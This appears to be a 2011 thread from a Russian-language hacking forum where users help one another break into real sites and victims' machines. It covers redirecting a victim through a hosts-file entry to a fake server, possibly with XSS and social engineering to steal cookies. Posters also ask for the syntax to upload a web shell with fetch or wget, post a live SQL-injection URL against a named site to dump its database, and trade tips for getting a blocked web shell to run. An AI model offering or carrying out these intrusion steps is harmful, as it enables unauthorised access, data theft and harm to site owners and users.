
01.04.2011, 22:36
|
|
Новичок
Регистрация: 05.02.2010
Сообщений: 0
С нами:
8559442
Репутация:
0
|
|
Сообщение от fl00der
Насколько доступ "неполный"?
Если можешь заливать/править файлы, подними фейк на дедике с белым IP и кинь жертве в хостс соответствующую запись, после ребута он попадет на фейк при заходе.
Лучше всего протесть все у себя для начала.
Доступ у стороннего человека, может вставить флэшку не на долгое время.. если бы я был уверен что в куки храниться то все можно было бы решить по средствам xss и соц. инженерии..
"подними фейк на дедике с белым IP и кинь жертве в хостс" - расшифруй это..я не хацкер, я простой юзер -)
Еще есть мысль Батником отредактировать закладки если сайт в них есть
|
|
|

02.04.2011, 13:51
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Moriarty
Да там видио косяк с путями! Я уже встречал такое на пхпбб...как только заливка чего либо завершается - выводится ошибка о неправильных путях... =\
Помогите разобраться с синтаксисом. Сервер под FreeBSD, как правильно составить команду, чтобы залить шелл?
rcp -p /usr/local/www/httpdocs/shell.php http://site.ru/shell.php
|
|
|

02.04.2011, 14:22
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от FlaktW
Помогите разобраться с синтаксисом. Сервер под FreeBSD, как правильно составить команду, чтобы залить шелл?
rcp -p /usr/local/www/httpdocs/shell.php http://site.ru/shell.php
wget, get, curl,fetch,lynx
|
|
|

02.04.2011, 14:28
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Gorev
wget, get, curl,fetch,lynx
Это FreeBSD и установлены:
/usr/bin/fetch
/bin/rcp
/bin/cp
/usr/bin/scp
|
|
|

03.04.2011, 15:53
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Помогите вывести БД.
http://skazka.nsk.ru/trick.29/id,40'/
|
|
|

03.04.2011, 19:18
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
При заходе на шелл пустая страница. Как быть? .htaccess нет возможности переписать.
|
|
|

03.04.2011, 20:11
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Lijzer
При заходе на шелл пустая страница. Как быть? .htaccess нет возможности переписать.
1. Может быть антивирус, попробуй другой шелл.
2. Может быть нет интерпритации php\или она отключена => попробуй perl\python шелл.
Попробуй . Если не выводит, то проблема в PHP.
|
|
|

03.04.2011, 21:03
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Tigger
1. Может быть антивирус, попробуй другой шелл.
2. Может быть нет интерпритации php\или она отключена => попробуй perl\python шелл.
Попробуй . Если не выводит, то проблема в PHP.
На перле залил шелл акцесс денайд.
>>> выводит
>>> не выводит
Как же обойти?
|
|
|

03.04.2011, 21:04
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Lijzer
смотря конечно же что конкретно фильтруется
|
|
|

03.04.2011, 21:06
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Lijzer
На перле залил шелл акцесс денайд.
>>> выводит
>>> не выводит
Как же обойти?
попробуй незакодированный шелл..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|